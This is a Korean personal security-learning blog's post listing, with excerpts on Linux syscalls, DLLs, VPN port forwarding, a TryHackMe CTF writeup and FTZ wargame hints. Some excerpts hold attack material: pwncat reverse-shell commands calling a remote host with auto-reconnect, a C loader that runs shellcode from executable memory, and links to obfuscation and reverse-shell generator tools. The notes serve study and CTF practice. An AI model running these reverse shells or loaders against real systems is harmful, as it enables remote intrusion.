본문 바로가기
  • Tried. Failed. Logged.
728x90

분류 전체보기720

어셈블리어 - 리눅스 syscall로 open, read, write 사용 리눅스 아키텍처 확인 명령어 uname -a syscall 테이블 https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit Chromium OS Docs - Linux System Call Table Linux System Call Table These are the system call numbers (NR) and their corresponding symbolic names. These vary significantly across architectures/ABIs, both in mappings and in actual name. This is a quick reference for p.. 2023. 3. 24.
리버싱 - 윈도우 쉘코드 실행 C언어 소스 #include #include int main(void){ char shellcode[] = {0x00,}; void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, sizeof shellcode); ((void(*)())exec)(); return 0; } 2023. 3. 23.
C/C++ - DLL 만들기, DLL 사용하기 (GCC) my_dll.c (DLL 만들기) #include void func() { system("start www.google.com");} GCC DLL 빌드 gcc -shared my_dll.dll -o my_dll.c run.c (DLL 사용하기) #include #include typedef void(*dll_func)();int main(){ HINSTANCE hDLL = LoadLibrary("my_dll.dll"); if(hDLL == NULL){ printf("Failed to load DLL\n"); return 1; } dll_func func = (dll_func)GetProcAddress(hDLL, "func"); if(func ==.. 2023. 3. 23.
네트워크 보안 - Mullvad VPN 포트포워딩으로 웹 서버 외부에서 접속 Mullvad VPN 사이트: 계정 > 장치 탭에서 내 장치 확인 주소: https://mullvad.net/ko/account/#/devices 내 장치에서 "포트 추가" 클릭 포트포워딩 설정 배정된 포트 번호 확인 나라-도시-포트번호 형식이며 뒤에 숫자 번호가 지정받은 내 포트 번호이다. Mullvad VPN 프로그램에서 톱니바퀴(설정) 클릭 "VPN 설정" 클릭 터널 프로토콜 항목에서 "OpenVPN"을 선택 반드시 VPN 서버의 연결된 위치가 포트포워딩 페이지에서 설정한 위치랑 일치하는지 확인 Mullvad VPN 사이트에서 포트 접속 확인하기 주소: https://mullvad.net/ko/check 자신의 IPv4 주소를 우선 확인 바로 하단에 "포트 확인" 탭으로 들어가 방금 전에 확인한 포.. 2023. 3. 19.
윈도우 - 프로그램 패킹 도구(UPX) UPX(Ultimate Packer for eXecutables)는 실행 파일의 크기를 줄이는 파일 패킹 프로그램입니다. https://upx.github.io/ UPX: the Ultimate Packer for eXecutables - Homepage Welcome UPX is a free, secure, portable, extendable, high-performance executable packer for several executable formats. Introduction UPX is an advanced executable file compressor. UPX will typically reduce the file size of programs and DLLs by around 50%-.. 2023. 3. 18.
TryHackMe - Simple CTF (2) Writeup 6번 질문. 획득한 세부 정보로 어디에서 로그인할 수 있나요?획득한 계정으로 다른 서비스 어디에 로그인이 가능하냐는 질문 같았다. 우선 알고 있는 계정은 mitch:secret이었으며 웹 서버의 SSH에도 로그인 가능한지 확인해 본다.  nmap으로 웹 서버의 ssh 포트 번호를 찾아준다. (result: 2222/tcp) ssh 로그인 단계에서 웹 사이트 관리자인 mitch 계정을 똑같이 입력하니 로그인이 성공했다.   6번 정답은 "ssh"  7번 질문. 사용자의 플래그는 무엇입니까? 찾는 건 간단하다.쉘에 들어가자마자 ls를 치면 user.txt란 파일이 하나 있는데 그 내용물이 바로 플래그이다.  7번 정답은 "G00d j0b, keep up!"  8번 질문. 홈 디렉터리에 다른 사용자가 있나요?.. 2023. 3. 18.
네트워크 해킹 - pwncat 리버스쉘 명령어 pip 설치 명령어 pip install pwncat victim(클라이언트)이 공격자(서버) 접속을 위한 설치 명령어 sudo pip install pwncat-cs 위는 공격자가 python3 -m pwncat 명령어를 쓰기 위한 설치 명령어 TCP Reverse shell(클라이언트) pwncat -e '/bin/bash' example.com 4444 pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10 10초마다 재연결 시도 공격자 리버스쉘 서버 오픈 python3 -m pwncat -lp 4444 pwncat 프롬프트 명령어 / 단축키 sessions: 연결된 victim들 확인 sessions {ID}: 상호작용 하려는 victi.. 2023. 3. 16.
파이썬 - 코드 난독화 변환 사이트(pyob.oxyry.com) https://pyob.oxyry.com/ Oxyry Python Obfuscator - The most reliable python obfuscator in the world Features Rename symbol names, includes variables, functions, classes, arguments, class private methods. The name replacer avoids a 1:1 mapping of cleartext names to obfuscated names, the same name may be converted to several different names within differen pyob.oxyry.com 2023. 3. 16.
웹 해킹 - 리버스 쉘 명령어 모음 사이트(revshells.com) https://www.revshells.com/ Online - Reverse Shell Generator Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs. www.revshells.com 2023. 3. 16.
FTZ - level 9 hint 다음은 /usr/bin/bof의 소스이다. #include #include #include main(){ char buf2[10]; char buf[10]; printf("It can be overflow : "); fgets(buf,40,stdin); if ( strncmp(buf2, "go", 2) == 0 ) { printf("Good Skill!\n"); setreuid( 3010, 3010 ); system("/bin/bash"); } } 이를 이용하여 level10의 권한을 얻어라. 버퍼 오버플로우에 관한 문제이다. fgets 함수로 사용자로부터 최대 40바이트 크기의 입력을 받고 있다. 문제는 buf2와 buf 변수의 사이즈는 10 밖에 안되기 때문에 버퍼가 오버플로우 돼서 프로그램.. 2023. 3. 15.
FTZ - level 8 with ChatGPT 오랜만에 FTZ를 풀어보기로 했다. 최근에 ChatGPT에 재미가 들려서 내가 많이 무지한 시스템 해킹에 관련한 질문들을 하면 챗봇 인공지능이 이해하기 쉬운 답변을 해줬는데 그 과정에 시스템 해킹에 흥미가 달아올라 다시 이어서 풀어보기로 한 것이다. 아무튼 level8에 로그인하여 힌트를 살펴보니 level9의 shadow 파일이 어딘가에 숨겨져 있다는 것과 사이즈는 2700이란 내용이다. shadow 파일이란? shadow 파일은 사용자 계정의 패스워드가 단방향 암호화인 해시 함수를 통해 암호화한 상태로 저장이 되는 아주 중요히 다뤄야 하는 파일이다. /etc/shadow 파일에 저장된다. 일반적으로 루트 권한만 열람이 가능하며, 일반 유저는 열어볼 수 없다. 사용자가 로그인을 할 때는 쉐도우 파일을 .. 2023. 3. 15.
머신러닝 - 머신러닝 쉽게 배우기 영상: https://youtu.be/432p379XXMw 원문: https://medium.com/@calebkaiser/dont-learn-machine-learning-8af3cf946214 Don’t learn machine learning Learn how to build software with ML models medium.com 요약: 머신러닝을 배우기 위해 밑반인 데이터 분석 구조부터 공부하는 것은 마치 응용 프로그램 개발자가 로우 랭귀지인 어셈블리 언어를 배우는 것과 비슷하다. 소프트웨어 개발을 위한 머신러닝을 배우기 위해서는 탑-다운 방식과 실행을 통한 학습 방법을 사용하라 chatGPT, YOLO 같은 프로젝트를 사용하는 것도 좋은 수단이다. 2023. 3. 13.
728x90